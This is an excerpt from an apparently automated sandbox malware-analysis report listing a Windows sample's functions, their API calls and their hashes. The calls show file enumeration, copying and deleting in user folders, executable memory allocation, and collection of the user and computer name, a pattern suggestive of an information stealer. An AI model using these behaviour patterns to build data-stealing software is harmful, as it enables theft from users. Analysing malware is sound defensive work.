Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 8be623ea72ddbf39f13edcf70d8c6f7f7743732f67fa21612de523fda4345dcc
Instruction ID: cc6eeb97174735b5dc95badcb68dd1d7533399b6c3af3383fb736553032ae182
Opcode Fuzzy Hash: 8be623ea72ddbf39f13edcf70d8c6f7f7743732f67fa21612de523fda4345dcc
Instruction Fuzzy Hash: 127112719101199BDF04EBA0DC6ADEE7B38BF94301F50461AF906A7191FF346A0DCB66

Function 00554BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B

lstrcat.KERNEL32(?,00000000), ref: 00554BEA
lstrcat.KERNEL32(?,0127D3F8), ref: 00554C08

Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943

Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92

Part of subcall function 00554910: wsprintfA.USER32 ref: 005549B0
Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,005608D2), ref: 005549C5
Part of subcall function 00554910: wsprintfA.USER32 ref: 005549E2
Part of subcall function 00554910: PathMatchSpecA.SHLWAPI(?,?), ref: 00554A1E
Part of subcall function 00554910: lstrcat.KERNEL32(?,0127E4D0), ref: 00554A4A
Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FF8), ref: 00554A5C
Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A70
Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FFC), ref: 00554A82
Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A96
Part of subcall function 00554910: CopyFileA.KERNEL32(?,?,00000001), ref: 00554AAC
Part of subcall function 00554910: DeleteFileA.KERNEL32(?), ref: 00554B31

Part of subcall function 00554910: wsprintfA.USER32 ref: 00554A07

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: b4931af077c606d39a64e44c8c803a5d23f3dceb771aed1d850f843793a6399f
Instruction ID: 0aaa584d8d698109fcf980376c5f722b0307580adbe4bfe19282947b3c7551fd
Opcode Fuzzy Hash: b4931af077c606d39a64e44c8c803a5d23f3dceb771aed1d850f843793a6399f
Instruction Fuzzy Hash: 4641A4B69002046BD754FBA0EC56EEE373DB7C8700F008549B94A57186EE795BCC8FA6

Function 00546660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00546706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00546753

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 69b7590da7bc2d6830f53f54f72ec6d6d5efe43dc2762b97aebe7b939efd2991
Instruction ID: 17e211e459dc821db3b43fbd0ec24f0a1b9fc1dc6c2f0bf7718111c60aea119c
Opcode Fuzzy Hash: 69b7590da7bc2d6830f53f54f72ec6d6d5efe43dc2762b97aebe7b939efd2991
Instruction Fuzzy Hash: 9841A874A00209EFCB44CF98C494BADBBB1FF44318F248699E9599B355D731EA81CB85

Function 00555050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B

lstrcat.KERNEL32(?,00000000), ref: 0055508A
lstrcat.KERNEL32(?,0127DB80), ref: 005550A8

Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: 0fd515de9c9d0534548652c943e5edec2cccd8376ade66eed2876e73bbac9c4a
Instruction ID: ea6c9255001f7d290ff7908bc5d3bc3675a3d4c84ccedf349c982ff69fc8ec12
Opcode Fuzzy Hash: 0fd515de9c9d0534548652c943e5edec2cccd8376ade66eed2876e73bbac9c4a
Instruction Fuzzy Hash: EB01DB7694020867D714FB70DC5BDEE377CBB94301F004146BA4952081EE789ACC8FA2

Function 005410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005410B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005410F7

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
Instruction ID: ad979e7d54e63171e9091120d29bd7897c341c9a54eab0ca3def99d3140d439e
Opcode Fuzzy Hash: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
Instruction Fuzzy Hash: 5AF0E271681208BBE7149AA4AC5DFBABBE8E705B15F304449F904E3280D5719F40DBA8

Function 00558D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00541B54,?,?,0056564C,?,?,00560E1F), ref: 00558D9F

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e34f0b34e1d517c49634dba962665d9563584317e35d9838e9bcd71b1fa455b9
Instruction ID: 1abe31ed3bca80a46a44d8c3b70360123fc1a93ff38d1577bed9ff7a185428f2
Opcode Fuzzy Hash: e34f0b34e1d517c49634dba962665d9563584317e35d9838e9bcd71b1fa455b9
Instruction Fuzzy Hash: 3FF0AC70C00208EBDB04EF94D5596ECBB74FB10312F50869ADC55672D0DB755A59DF81

Function 00558DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: ffeacdb2eaa99b654440acf634e98b2cca2e3172228cccac522327b4ba011630
Instruction ID: 5689d28ec68a6f7a63abd8587e79509de6be58fa520b1a31e08ed64bbfe19149
Opcode Fuzzy Hash: ffeacdb2eaa99b654440acf634e98b2cca2e3172228cccac522327b4ba011630
Instruction Fuzzy Hash: E9E0123194034C7BDB51DB50CC96FAD777CEB44B01F004295BA1C5A1C0DE70AB858B91

Function 00541190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F

Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F

ExitProcess.KERNEL32 ref: 005411C6

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
Instruction ID: b55363fb87426da481e92bb1159e7fbf36ff10ec0fb6d647fcb5b2724e286043
Opcode Fuzzy Hash: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
Instruction Fuzzy Hash: 9CE0ECB595420663DA0073B0BC1EB2A3A9C7B5434AF144426BE0592502FE29E854866E

Function 00558E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

